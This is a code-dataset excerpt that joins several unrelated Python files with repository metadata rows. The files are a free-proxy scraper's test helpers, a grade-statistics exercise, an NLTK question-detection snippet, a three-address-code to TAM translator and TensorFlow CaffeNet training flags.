    #         res = request.get(url).json()
    #         for row in res['RESULT']['rows']:
    #             yield '{}:{}'.format(row['ip'], row['port'])
    #     except Exception as e:
    #         pass
    # @staticmethod
    # def cnproxy():
    #     urls = ['http://cn-proxy.com/', 'http://cn-proxy.com/archives/218']
    #     request = WebRequest()
    #     for url in urls:
    #         r = request.get(url)
    #         proxies = re.findall(r'<td>(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})</td>[\w\W]<td>(\d+)</td>', r.text)
    #         for proxy in proxies:
    #             yield ':'.join(proxy)
    # @staticmethod
    # def proxylist():
    #     urls = ['https://proxy-list.org/english/index.php?p=%s' % n for n in range(1, 10)]
    #     request = WebRequest()
    #     import base64
    #     for url in urls:
    #         r = request.get(url)
    #         proxies = re.findall(r"Proxy\('(.*?)'\)", r.text)
    #         for proxy in proxies:
    #             yield base64.b64decode(proxy).decode()
def checkAllProxy():
    """Run every FetchFreeProxy fetcher and log how many well-formed
    proxies each one yields.

    Returns:
        None
    """
    import inspect
    members = inspect.getmembers(FetchFreeProxy, predicate=inspect.isfunction)
    counts = {}
    for name, fetcher in members:
        log.debug(u"开始运行代理: {}".format(name))
        try:
            valid = [p for p in fetcher() if verifyProxyFormat(p)]
        except Exception as exc:
            log.error(u"代理获取函数 {} 运行出错!".format(name))
            log.error(str(exc))
        else:
            counts[name] = len(valid)
    log.info(u"所有函数运行完毕 " + "***" * 5)
    for name, _fetcher in members:
        log.debug(u"函数: {n}, 获取到代理数: {c}".format(n=name, c=counts.get(name, 0)))
def checkSingleProxy(func):
    """Exercise a single FetchFreeProxy fetcher, logging each well-formed
    proxy it yields.

    Args:
        func: one of the callables defined on FetchFreeProxy
    Returns:
        None
    """
    name = getattr(func, '__name__', "None")
    log.info("start running func: {}".format(name))
    total = 0
    for candidate in func():
        if not verifyProxyFormat(candidate):
            continue
        log.debug("{} fetch proxy: {}".format(name, candidate))
        total += 1
    log.debug("{n} completed, fetch proxy number: {c}".format(n=name, c=total))
if __name__ == '__main__':
    # proxylistplus(FetchFreeProxy.proxylistplus)
    # NOTE(review): checkSingleProxy has no return statement, so this
    # prints 'None' after the log output — probably only the call was meant.
    print(checkSingleProxy(FetchFreeProxy.coderbusy))
| 36.94302 | 134 | 0.488162 | 1,477 | 12,967 | 4.199729 | 0.215978 | 0.008061 | 0.011607 | 0.012252 | 0.34048 | 0.270031 | 0.226342 | 0.212317 | 0.168467 | 0.154603 | 0 | 0.027294 | 0.336007 | 12,967 | 350 | 135 | 37.048571 | 0.693148 | 0.390376 | 0 | 0.297468 | 0 | 0.037975 | 0.19589 | 0.039632 | 0 | 0 | 0 | 0 | 0 | 1 | 0.063291 | false | 0.018987 | 0.056962 | 0 | 0.132911 | 0.025316 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8ea66006c86aaaba9532a364fe87531b05105008 | 1,384 | py | Python | Mundo 3/File 105.py | PedroHenriqueSimoes/Exercicios-Python | 702a819d508dd7878b88fb676559d899237ac761 | [
"MIT"
] | 1 | 2020-04-30T21:32:01.000Z | 2020-04-30T21:32:01.000Z | Mundo 3/File 105.py | PedroHenriqueSimoes/Exercicios-Python | 702a819d508dd7878b88fb676559d899237ac761 | [
"MIT"
] | 1 | 2021-10-05T02:00:04.000Z | 2021-10-05T02:00:04.000Z | Mundo 3/File 105.py | PedroHenriqueSimoes/Exercicios-Python | 702a819d508dd7878b88fb676559d899237ac761 | [
"MIT"
def notas(*n, show=False):
    """
    -> Reads several grades and returns a dictionary of statistics.
    :param n: grades (any number of positional values)
    :param show: also include the student's situation (optional)
    :return: dict with keys 'total', 'maior', 'menor', 'media' and,
             when show=True, 'situação'
    """
    dados = dict()
    dados['total'] = len(n)
    dados['maior'] = max(n)
    dados['menor'] = min(n)
    dados['media'] = sum(n) / dados['total']
    if show:
        # BUG FIX: the low-average branch previously stored the result
        # under the misspelled key 'situaçãos', so averages <= 5 were
        # reported under a different key than the other two cases.
        if dados['media'] >= 7:
            dados['situação'] = 'BOA !'
        elif 7 > dados['media'] > 5:
            dados['situação'] = 'RAZOAVEL !'
        else:  # media <= 5
            dados['situação'] = 'RUIM !'
    return dados
# --- Interactive driver: collect grades, then report the summary dict. ---
user = list()   # Grades typed by the user.
t = bool()      # Whether to show the situation (defaults to False).
while True:
    user.append(float(input('Informe uma nota: ')))
    resp = ' '
    # Keep asking until the user answers S/s (continue) or N/n (stop).
    while resp not in 'SsNn':
        resp = (str(input('Deseja continuar: [S/N] '))).strip()[0]
        if resp in 'Ss':
            break
        if resp in 'Nn':
            break
        print('\033[31m:<errozin>: Informe apenas os valores S ou N !\033[m')
    if resp in 'Nn':
        break
most = ' '
# Ask whether the situation should be included in the report.
while most not in 'SsNn':
    most = (str(input('Deseja mostra a situação? [S/N] '))).strip()[0]
    if most in 'Ss':
        t = True
        break
    elif most in 'Nn':
        t = False
        break
    print('\033[31m:<errozin>: Informe apenas os valores S ou N ! \033[m')
# BUG FIX: notas() takes the grades as *n varargs; the original passed the
# whole list as one positional argument, which made sum()/the average
# computation inside notas() raise a TypeError.
tot = notas(*user, show=t)
print(tot)
| 28.244898 | 77 | 0.533237 | 188 | 1,384 | 3.925532 | 0.414894 | 0.03252 | 0.03252 | 0.04336 | 0.204607 | 0.143631 | 0.143631 | 0.143631 | 0.143631 | 0.143631 | 0 | 0.022893 | 0.305636 | 1,384 | 48 | 78 | 28.833333 | 0.745057 | 0.134393 | 0 | 0.225 | 0 | 0 | 0.257485 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.025 | false | 0 | 0 | 0 | 0.05 | 0.075 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8ea6772e802a782c50f83515c19392b32fbb9402 | 779 | py | Python | Backend/ChatBot/question detection.py | paucutrina/RareHacks_Chatbot | c7ecfef693bf2f477d090629d6eecf7b0bf57872 | [
"MIT"
] | null | null | null | Backend/ChatBot/question detection.py | paucutrina/RareHacks_Chatbot | c7ecfef693bf2f477d090629d6eecf7b0bf57872 | [
"MIT"
] | null | null | null | Backend/ChatBot/question detection.py | paucutrina/RareHacks_Chatbot | c7ecfef693bf2f477d090629d6eecf7b0bf57872 | [
"MIT"
] | null | null | null | from nltk import sent_tokenize, word_tokenize, pos_tag, ne_chunk
# Split the sample text into sentences, then into word tokens.
sentence = 'Usually I go to the hospital when I am afraid. When I sould go there?'
sentences_splitted = sent_tokenize(sentence)
sentence_words_splitted = [word_tokenize(s) for s in sentences_splitted]
# NOTE(review): pos_tag is given the raw sentence string here, not the
# token list — presumably sentence_words_splitted was intended; confirm
# against nltk.pos_tag's expected input.  `question` is also never used
# below.
question = [ne_chunk(pos_tag(s)) for s in sentences_splitted]
labeled_sentence = []
helping_verbs = ['is', 'am', 'are', 'was', 'were', 'be', 'being', 'been', 'has', 'have', 'had', 'do', 'does', 'did',
                 'will', 'shall', 'should', 'would']
# Heuristic question detector: keep token lists whose first word looks like
# a wh-word or a helping verb, or whose last token is '?'.
# NOTE(review): the 'wh' substring test is case-sensitive, so capitalized
# sentence-initial words like 'When' do not match — confirm intent.
for sentence in sentence_words_splitted:
    if 'wh' in sentence[0] or '?' in sentence[-1] or sentence[0] in helping_verbs:  # First word is where, when, which, who, what... and not helping verbs in the first word
        labeled_sentence.append(sentence)
| 51.933333 | 172 | 0.69448 | 117 | 779 | 4.461538 | 0.529915 | 0.097701 | 0.08046 | 0.02682 | 0.091954 | 0.091954 | 0 | 0 | 0 | 0 | 0 | 0.00463 | 0.168164 | 779 | 14 | 173 | 55.642857 | 0.800926 | 0.110398 | 0 | 0 | 0 | 0 | 0.197101 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.090909 | 0 | 0.090909 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8ea86f5c1066313076da8b4f11d85883b0f7d98c | 16,079 | py | Python | tp4/src/back-end/translator.py | ha2398/compiladores1-tps | a70de7cbb6a76301258f1e0f88141a57c6a15d5e | [
"MIT"
] | null | null | null | tp4/src/back-end/translator.py | ha2398/compiladores1-tps | a70de7cbb6a76301258f1e0f88141a57c6a15d5e | [
"MIT"
] | null | null | null | tp4/src/back-end/translator.py | ha2398/compiladores1-tps | a70de7cbb6a76301258f1e0f88141a57c6a15d5e | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
'''
translator.py: 3 address code -> TAM translator.
@author: Hugo Araujo de Sousa [2013007463]
@email: hugosousa@dcc.ufmg.br
@DCC053 - Compiladores I - UFMG
'''
# TODO: Need to handle floating point literals.
# TAM does not provide arithmetic routines for floating point!?
import argparse as ap
from quadruple import Quadruple
from math import floor
# Global variables.
# Input/output file handles; opened by main().
input_file = None
output_file = None
# Sizes (in 2B words) of the grammar types.
TSIZES = {'int': 2, 'float': 4, 'char': 1, 'bool': 1}
# Largest type size; temporaries are allocated with this size.
MAX_SIZE = TSIZES['float']
# Stack top: next free stack address, in words.
ST = 0
# Code stack top: address of the next emitted instruction.
CT = 0
# Address, on the stack, of the variables.
addresses = {}
# Types of the variables.
types = {}
# Dictionary which returns the Quadruple by label.
labels = {}
# Instruction format: opcode, register, n, d, then a '; mnemonic' comment.
INSTR = '{}\t{}\t{}\t{}\t; {}\n'
# Instruction buffer: (formatted instruction, originating Quadruple) pairs.
INSTR_BUFFER = []
################################################################################
def str2bool(string):
    ''' Case-insensitive conversion of a string to bool.
    @param string: String to be converted.
    @type string: String.
    @return: True iff the string spells "true" in any letter case.
    @rtype: Bool.
    '''
    lowered = string.lower()
    return lowered == 'true'
def parse_arguments():
    ''' Add command line arguments to the program.
    @return: Command line arguments.
    @rtype: argparse.Namespace.
    '''
    arg_parser = ap.ArgumentParser()
    for arg_name, description in (('INPUT_FILE', 'Name of input file'),
                                  ('OUTPUT_FILE', 'Name of output file')):
        arg_parser.add_argument(arg_name, type=str, help=description)
    return arg_parser.parse_args()
def add_instr(instr, quad):
    ''' Buffer a formatted TAM instruction for later output.
    @param instr: Instruction to buffer.
    @type instr: String.
    @param quad: Quadruple that generated the instruction.
    @type quad: Quadruple.
    '''
    global CT
    # Advance the code stack top and remember which quadruple emitted this.
    CT = CT + 1
    INSTR_BUFFER.append((instr, quad))
def read_decls():
    ''' Read the program's declarations.

    Consumes lines from the global input_file until a (near-)empty line
    ends the declaration section.  A simple variable line is
    "<type> <name>"; an array line is "<count> <type> <name>[...]".
    Each declaration reserves `size` words on the stack (advancing the
    global stack top ST), records the variable's address and type, and
    emits one PUSH instruction.
    '''
    global ST, CT
    print('-------------------BEGIN INPUT-------------------')
    while True:
        line = input_file.readline()
        print(line.strip('\n'))
        # A line holding at most a newline terminates the declarations.
        if len(line) <= 2:
            break
        else:
            # Strip array brackets so split() yields bare tokens.
            line = line.replace('[', '')
            line = line.replace(']', '')
            args = line.split()
            if len(args) < 3: # Simple variable
                if args[1] not in addresses:
                    size = TSIZES[args[0]]
                    addresses[args[1]] = ST
                    ST += size
                    types[args[1]] = args[0]
            else: # Array
                if args[2] not in addresses:
                    size = TSIZES[args[1]] * int(args[0])
                    addresses[args[2]] = ST
                    ST += size
                    types[args[2]] = args[1]
            # NOTE(review): if a name was already declared, `size` here is
            # stale from the previous line (or unbound on the very first
            # one) — confirm duplicate declarations cannot occur in valid
            # input.
            add_instr(INSTR.format(10, 0, 0, size, 'PUSH ' + str(size)), None)
def build_quadruples():
    ''' Build quadruples from the instructions in the source code.

    Parses the remaining lines of the global input_file.  Leading "Ln:"
    prefixes are collected as labels; each label maps to the quadruple
    built from that line (or to None for a trailing empty labeled line,
    which backpatching later resolves to the end of the program).
    @return quads: Quadruples built.
    @rtype quads: List of Quadruple.
    '''
    global CT, ST
    quads = []
    for line in input_file: # Get all quadruples in source code
        print(line.strip('\n'))
        newQuad = None
        line_args = line.split()
        L = []
        if ':' in line_args[0]: # Collect Quadruple labels
            # Labels look like "L3:" — drop the leading 'L' and keep ints.
            L = [int(x[1:]) for x in line_args[0].split(':') if x != '']
            del line_args[0]
        if len(line_args) != 0: # Non empty quadruples
            if 'if' in line_args[0]: # Conditional
                op = line_args[0]
                # Relational condition "a relop b" vs. a bare boolean.
                if len(line_args) == 6:
                    cond = line_args[1:4]
                else:
                    cond = line_args[1:2]
                branch = int(line_args[-1][1:])
                newQuad = Quadruple(None, cond, None, op, branch)
            elif 'goto' == line_args[0]: # Unconditional jump
                branch = int(line_args[1][1:])
                newQuad = Quadruple(None, None, None, line_args[0], branch)
            else: # Operation
                dst = line_args[0]
                if dst not in addresses: # Allocate memory for temporaries
                    addresses[dst] = ST
                    ST += MAX_SIZE
                    types[dst] = 'float'
                    add_instr(INSTR.format(10, 0, 0, MAX_SIZE,
                        'PUSH ' + str(MAX_SIZE)), None)
                # Get operator and operands
                if line_args[1] == '[': # Array indexing l-value
                    op = '[]='
                    op1 = line_args[2]
                    op2 = line_args[5]
                    newQuad = Quadruple(dst, op1, op2, op)
                else:
                    # Dispatch on token count: "d = a" / "d = a op b" /
                    # "d = a [ i ]" / "d = op b".
                    if len(line_args) == 3: # Simple copy assignments
                        op1 = line_args[2]
                        newQuad = Quadruple(dst, op1, None, None)
                    elif len(line_args) == 5: # Arithmetic
                        op = line_args[3]
                        op1 = line_args[2]
                        op2 = line_args[4]
                        newQuad = Quadruple(dst, op1, op2, op)
                    elif len(line_args) == 6: # Array indexing r-value
                        op = '=[]'
                        op1 = line_args[2]
                        op2 = line_args[4]
                        newQuad = Quadruple(dst, op1, op2, op)
                    else: # Unary
                        op = line_args[2]
                        op2 = line_args[3]
                        newQuad = Quadruple(dst, None, op2, op)
        if newQuad:
            quads.append(newQuad)
        for label in L: # Each label points to their proper quadruple
            labels[label] = newQuad
    print('--------------------END INPUT--------------------')
    return quads
def translate(quads):
    ''' Translate quadruples to TAM code.
        Types of quadruples:
            1. Conditional jump.
            2. Unconditional jump.
            3. Array indexing l-value assignment.
            4. Array indexing r-value assignment.
            5. Simple variable copy assignments.
            6. Arithmetic assignment.
            7. Unary assignment.
    @param quads: Quadruples to translate.
    @type quads: List of Quadruple.
    '''
    for quad in quads:
        # Record where this quadruple's code starts, for backpatching.
        quad.address = CT
        quad_type = quad.type
        if quad_type == 1: # Conditional jump.
            # Push the condition bool value to stack.
            cond = quad.op1
            if len(cond) == 3: # Relational operation
                if cond[0] in addresses: # Operand is variable
                    addr_op1 = addresses[cond[0]]
                    op1_size = TSIZES[types[cond[0]]]
                    add_instr(INSTR.format(1, 4, 0, addr_op1,
                        'LOADA ' + str(addr_op1) + '[SB]'), quad)
                    add_instr(INSTR.format(2, 0, op1_size, 0,
                        'LOADI(' + str(op1_size) + ')'), quad)
                else: # Operand is not variable
                    if cond[0] == 'true' or cond[0] == 'false':
                        literal = int(str2bool(cond[0]))
                    else:
                        literal = int(floor(float(cond[0])))
                    add_instr(INSTR.format(3, 0, 0, literal,
                        'LOADL ' + str(literal)), quad)
                if cond[2] in addresses: # Operand is variable
                    addr_op1 = addresses[cond[2]]
                    op1_size = TSIZES[types[cond[2]]]
                    add_instr(INSTR.format(1, 4, 0, addr_op1,
                        'LOADA ' + str(addr_op1) + '[SB]'), quad)
                    add_instr(INSTR.format(2, 0, op1_size, 0,
                        'LOADI(' + str(op1_size) + ')'), quad)
                else: # Operand is not variable
                    if cond[2] == 'true' or cond[2] == 'false':
                        literal = int(str2bool(cond[2]))
                    else:
                        literal = int(floor(float(cond[2])))
                    add_instr(INSTR.format(3, 0, 0, literal,
                        'LOADL ' + str(literal)), quad)
                # Perform comparison
                relop = cond[1]
                if relop == '<':
                    mnemo = 'lt'
                    d = 13
                    add_instr(INSTR.format(6, 2, 0, d, mnemo), quad)
                elif relop == '<=':
                    mnemo = 'le'
                    d = 14
                    add_instr(INSTR.format(6, 2, 0, d, mnemo), quad)
                elif relop == '>=':
                    mnemo = 'ge'
                    d = 15
                    add_instr(INSTR.format(6, 2, 0, d, mnemo), quad)
                elif relop == '>':
                    mnemo = 'gt'
                    d = 16
                    add_instr(INSTR.format(6, 2, 0, d, mnemo), quad)
                else:
                    # eq/ne primitives compare blocks, so push the
                    # operators size first.
                    op_size = TSIZES[types[cond[0]]]
                    add_instr(INSTR.format(3, 0, 0, op_size,
                        'LOADL ' + str(op_size)), quad)
                    if relop == '==':
                        mnemo = 'eq'
                        d = 17
                        add_instr(INSTR.format(6, 2, 0, d, mnemo), quad)
                    else: # !=
                        mnemo = 'ne'
                        d = 18
                        add_instr(INSTR.format(6, 2, 0, d, mnemo), quad)
            else: # Simple boolean
                if cond[0] in addresses: # Operand is variable
                    addr_op1 = addresses[cond[0]]
                    op1_size = TSIZES[types[cond[0]]]
                    add_instr(INSTR.format(1, 4, 0, addr_op1,
                        'LOADA ' + str(addr_op1) + '[SB]'), quad)
                    add_instr(INSTR.format(2, 0, op1_size, 0,
                        'LOADI(' + str(op1_size) + ')'), quad)
                else: # Operand is not variable
                    if cond[0] == 'true' or cond[0] == 'false':
                        literal = int(str2bool(cond[0]))
                    else:
                        literal = int(floor(float(cond[0])))
                    add_instr(INSTR.format(3, 0, 0, literal,
                        'LOADL ' + str(literal)), quad)
            # Jump to label according to result ('if' jumps on true,
            # 'iffalse' jumps on false).  The '{}' target is backpatched.
            n = 1 if quad.operator == 'if' else 0
            add_instr(INSTR.format(14, 0, n, '{}',
                'JUMPIF(' + str(n) + ') {}[CB]'), quad)
        elif quad_type == 2: # Unconditional jump.
            add_instr(INSTR.format(12, 0, 0, '{}', 'JUMP {}[CB]'), quad)
        elif quad_type == 3: # Array indexing l-value assignment.
            if quad.op2 in addresses: # Operand 2 is variable
                addr_op2 = addresses[quad.op2]
                op2_size = TSIZES[types[quad.op2]]
                add_instr(INSTR.format(1, 4, 0, addr_op2,
                    'LOADA ' + str(addr_op2) + '[SB]'), quad)
                add_instr(INSTR.format(2, 0, op2_size, 0,
                    'LOADI(' + str(op2_size) + ')'), quad)
            else: # Operand 2 is literal
                if quad.op2 == 'true' or quad.op2 == 'false':
                    literal = int(str2bool(quad.op2))
                else:
                    literal = int(floor(float(quad.op2)))
                add_instr(INSTR.format(3, 0, 0, literal,
                    'LOADL ' + str(literal)), quad)
            # Get array element address with offset.
            # 1. Push offset to stack
            if quad.op1 in addresses: # Operand is variable
                addr_op1 = addresses[quad.op1]
                op1_size = TSIZES[types[quad.op1]]
                add_instr(INSTR.format(1, 4, 0, addr_op1,
                    'LOADA ' + str(addr_op1) + '[SB]'), quad)
                add_instr(INSTR.format(2, 0, op1_size, 0,
                    'LOADI(' + str(op1_size) + ')'), quad)
            else: # Operand is not variable
                if quad.op1 == 'true' or quad.op1 == 'false':
                    literal = int(str2bool(quad.op1))
                else:
                    literal = int(floor(float(quad.op1)))
                add_instr(INSTR.format(3, 0, 0, literal,
                    'LOADL ' + str(literal)), quad)
            # 2. Push base address to stack
            addr_base = addresses[quad.dst]
            add_instr(INSTR.format(1, 4, 0, addr_base,
                'LOADA ' + str(addr_base) + '[SB]'), quad)
            # 3. Add them up.
            mnemo = 'add'
            d = 8
            add_instr(INSTR.format(6, 2, 0, d, mnemo), quad)
            # 4. Store r-value in that address.
            dst_size = TSIZES[types[quad.dst]]
            add_instr(INSTR.format(5, 0, dst_size, 0,
                'STOREI(' + str(dst_size) + ')'), quad)
        elif quad_type == 4: # Array indexing r-value assignment.
            # Get array element address with offset.
            # 1. Push offset to stack
            if quad.op2 in addresses: # Operand is variable
                addr_op2 = addresses[quad.op2]
                op2_size = TSIZES[types[quad.op2]]
                add_instr(INSTR.format(1, 4, 0, addr_op2,
                    'LOADA ' + str(addr_op2) + '[SB]'), quad)
                # BUG FIX: this LOADI loads op2, so its n field must be
                # op2_size; the original used op1_size, which is stale
                # (or unbound) in this branch.
                add_instr(INSTR.format(2, 0, op2_size, 0,
                    'LOADI(' + str(op2_size) + ')'), quad)
            else: # Operand is not variable
                if quad.op2 == 'true' or quad.op2 == 'false':
                    literal = int(str2bool(quad.op2))
                else:
                    literal = int(floor(float(quad.op2)))
                add_instr(INSTR.format(3, 0, 0, literal,
                    'LOADL ' + str(literal)), quad)
            # 2. Push base address to stack
            addr_base = addresses[quad.op1]
            add_instr(INSTR.format(1, 4, 0, addr_base,
                'LOADA ' + str(addr_base) + '[SB]'), quad)
            # 3. Add them up.
            mnemo = 'add'
            d = 8
            add_instr(INSTR.format(6, 2, 0, d, mnemo), quad)
            # 4. Get r-value
            op_size = TSIZES[types[quad.op1]]
            add_instr(INSTR.format(2, 0, op_size, 0,
                'LOADI(' + str(op_size) + ')'), quad)
            # Push destination address onto stack and store r-value there.
            addr_dst = addresses[quad.dst]
            dst_size = TSIZES[types[quad.dst]]
            add_instr(INSTR.format(1, 4, 0, addr_dst,
                'LOADA ' + str(addr_dst) + '[SB]'), quad)
            add_instr(INSTR.format(5, 0, dst_size, 0,
                'STOREI(' + str(dst_size) + ')'), quad)
        elif quad_type == 5: # Simple variable copy assignments.
            if quad.op1 in addresses: # Operand is variable
                addr_op1 = addresses[quad.op1]
                op1_size = TSIZES[types[quad.op1]]
                add_instr(INSTR.format(1, 4, 0, addr_op1,
                    'LOADA ' + str(addr_op1) + '[SB]'), quad)
                add_instr(INSTR.format(2, 0, op1_size, 0,
                    'LOADI(' + str(op1_size) + ')'), quad)
            else: # Operand is not variable
                if quad.op1 == 'true' or quad.op1 == 'false':
                    literal = int(str2bool(quad.op1))
                else:
                    literal = int(floor(float(quad.op1)))
                add_instr(INSTR.format(3, 0, 0, literal,
                    'LOADL ' + str(literal)), quad)
            addr_dst = addresses[quad.dst]
            dst_size = TSIZES[types[quad.dst]]
            add_instr(INSTR.format(1, 4, 0, addr_dst,
                'LOADA ' + str(addr_dst) + '[SB]'), quad)
            add_instr(INSTR.format(5, 0, dst_size, 0,
                'STOREI(' + str(dst_size) + ')'), quad)
        elif quad_type == 6: # Arithmetic assignment.
            addr_dst = addresses[quad.dst]
            dst_size = TSIZES[types[quad.dst]]
            if quad.op1 in addresses: # Operand 1 is variable
                addr_op1 = addresses[quad.op1]
                op1_size = TSIZES[types[quad.op1]]
                add_instr(INSTR.format(1, 4, 0, addr_op1,
                    'LOADA ' + str(addr_op1) + '[SB]'), quad)
                add_instr(INSTR.format(2, 0, op1_size, 0,
                    'LOADI(' + str(op1_size) + ')'), quad)
            else: # Operand 1 is literal
                if quad.op1 == 'true' or quad.op1 == 'false':
                    literal = int(str2bool(quad.op1))
                else:
                    literal = int(floor(float(quad.op1)))
                add_instr(INSTR.format(3, 0, 0, literal,
                    'LOADL ' + str(literal)), quad)
            if quad.op2 in addresses: # Operand 2 is variable
                addr_op2 = addresses[quad.op2]
                op2_size = TSIZES[types[quad.op2]]
                add_instr(INSTR.format(1, 4, 0, addr_op2,
                    'LOADA ' + str(addr_op2) + '[SB]'), quad)
                add_instr(INSTR.format(2, 0, op2_size, 0,
                    'LOADI(' + str(op2_size) + ')'), quad)
            else: # Operand 2 is literal
                if quad.op2 == 'true' or quad.op2 == 'false':
                    literal = int(str2bool(quad.op2))
                else:
                    literal = int(floor(float(quad.op2)))
                add_instr(INSTR.format(3, 0, 0, literal,
                    'LOADL ' + str(literal)), quad)
            # Perform operation
            if quad.operator == '+':
                mnemo = 'add'
                d = 8
            elif quad.operator == '-':
                mnemo = 'sub'
                d = 9
            elif quad.operator == '*':
                mnemo = 'mult'
                d = 10
            else:
                mnemo = 'div'
                d = 11
            add_instr(INSTR.format(6, 2, 0, d, mnemo), quad)
            add_instr(INSTR.format(1, 4, 0, addr_dst,
                'LOADA ' + str(addr_dst) + '[SB]'), quad)
            add_instr(INSTR.format(5, 0, dst_size, 0,
                'STOREI(' + str(dst_size) + ')'), quad)
        elif quad_type == 7: # Unary assignment.
            # Unary minus is computed as 0 - op2.
            addr_dst = addresses[quad.dst]
            dst_size = TSIZES[types[quad.dst]]
            add_instr(INSTR.format(3, 0, 0, 0,
                'LOADL 0'), quad)
            if quad.op2 in addresses: # Operand 2 is variable
                addr_op2 = addresses[quad.op2]
                op2_size = TSIZES[types[quad.op2]]
                add_instr(INSTR.format(1, 4, 0, addr_op2,
                    'LOADA ' + str(addr_op2) + '[SB]'), quad)
                add_instr(INSTR.format(2, 0, op2_size, 0,
                    'LOADI(' + str(op2_size) + ')'), quad)
            else: # Operand 2 is literal
                if quad.op2 == 'true' or quad.op2 == 'false':
                    literal = int(str2bool(quad.op2))
                else:
                    literal = int(floor(float(quad.op2)))
                add_instr(INSTR.format(3, 0, 0, literal,
                    'LOADL ' + str(literal)), quad)
            # Perform operation
            d = 9
            mnemo = 'sub'
            add_instr(INSTR.format(6, 2, 0, d, mnemo), quad)
            add_instr(INSTR.format(1, 4, 0, addr_dst,
                'LOADA ' + str(addr_dst) + '[SB]'), quad)
            add_instr(INSTR.format(5, 0, dst_size, 0,
                'STOREI(' + str(dst_size) + ')'), quad)
    # Terminate the program.
    add_instr(INSTR.format(15, 0, 0, 0, 'HALT'), None)
def backpatching():
    ''' Perform backpatching to assign labels.

    Rewrites every buffered instruction whose branch target is the '{}'
    placeholder, replacing it with the address of the labeled quadruple
    (or with CT, the end of the program, when the label maps to None).
    '''
    for idx, (instruction, quadruple) in enumerate(INSTR_BUFFER):
        if '{}' not in instruction:
            continue
        target = labels[quadruple.branch]
        address = CT if target == None else target.address
        INSTR_BUFFER[idx] = (instruction.format(address, address), quadruple)
def finish():
    ''' Finish the translation: close the input file, flush every
    buffered instruction to the output file and close it. '''
    input_file.close()
    output_file.writelines(instr for instr, _quad in INSTR_BUFFER)
    output_file.close()
def main():
    ''' Program entry point: parse the command line, read declarations,
    build the quadruples, translate them to TAM code, backpatch jump
    targets and write the result to the output file. '''
    global input_file, output_file
    args = parse_arguments()
    input_file = open(args.INPUT_FILE, 'r')
    output_file = open(args.OUTPUT_FILE, 'w')
    read_decls()
    quads = build_quadruples()
    translate(quads)
    backpatching()
    finish()
################################################################################
# Guard the entry point so importing this module does not run the translator.
if __name__ == '__main__':
    main()
| 26.57686 | 80 | 0.602525 | 2,320 | 16,079 | 4.072414 | 0.109914 | 0.050804 | 0.082557 | 0.118649 | 0.600021 | 0.574619 | 0.540538 | 0.52699 | 0.52699 | 0.497248 | 0 | 0.038027 | 0.229678 | 16,079 | 604 | 81 | 26.620861 | 0.72477 | 0.193296 | 0 | 0.540052 | 0 | 0 | 0.060002 | 0.007539 | 0 | 0 | 0 | 0.001656 | 0 | 1 | 0.023256 | false | 0 | 0.007752 | 0 | 0.03876 | 0.010336 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8eab3a16c60da45c7e9e2c9740482835876404d6 | 2,501 | py | Python | CaffeNet/caffenet_settings.py | MasazI/DeepLearning_TensorFlow | 6a0865850b32eb4af52bc41984e0cbaa2a19c48a | [
"MIT"
] | 17 | 2015-12-20T14:10:35.000Z | 2022-02-28T13:06:33.000Z | CaffeNet/caffenet_settings.py | MasazI/DeepLearning_TensorFlow | 6a0865850b32eb4af52bc41984e0cbaa2a19c48a | [
"MIT"
] | 1 | 2019-02-20T12:37:56.000Z | 2019-02-20T12:37:56.000Z | CaffeNet/caffenet_settings.py | MasazI/DeepLearning_TensorFlow | 6a0865850b32eb4af52bc41984e0cbaa2a19c48a | [
"MIT"
] | 8 | 2015-11-14T04:32:10.000Z | 2020-12-26T01:12:18.000Z | # encoding: utf-8
import tensorflow as tf
# TensorFlow command-line flag definitions for CaffeNet training/evaluation.
flags = tf.app.flags
FLAGS = flags.FLAGS
# train settings
flags.DEFINE_integer('batch_size', 40, 'the number of images in a batch.')
flags.DEFINE_integer('training_data_type', 1, '0: directly feed, 1: tfrecords')
#flags.DEFINE_string('train_tfrecords', 'data/train_caltech_random.tfrecords', 'path to tfrecords file for train.')
flags.DEFINE_string('train_tfrecords', 'data/train_ex_norm.tfrecords', 'path to tfrecords file for train.')
flags.DEFINE_integer('image_height', 256, 'image height.')
flags.DEFINE_integer('image_width', 256, 'image width.')
flags.DEFINE_integer('image_depth', 3, 'image depth.')
flags.DEFINE_integer('crop_size', 227, 'crop size of image.')
flags.DEFINE_float('learning_rate', 1e-2, 'initial learning rate.')
flags.DEFINE_float('learning_rate_decay_factor', 0.1, 'learning rate decay factor.')
flags.DEFINE_float('num_epochs_per_decay', 350.0, 'epochs after which learning rate decays.')
# Typo fix in help text: 'averate' -> 'average'.
flags.DEFINE_float('moving_average_decay', 0.9999, 'decay to use for the moving average.')
flags.DEFINE_integer('num_examples_per_epoch_for_train', 400, 'the number of examples per epoch train.')
# Typo fix in help text: 'eposh' -> 'epoch'.
flags.DEFINE_integer('num_examples_per_epoch_for_eval', 400, 'the number of examples per epoch eval.')
flags.DEFINE_string('tower_name', 'tower', 'multiple GPU prefix.')
#flags.DEFINE_integer('num_classes', 10, 'the number of classes.')
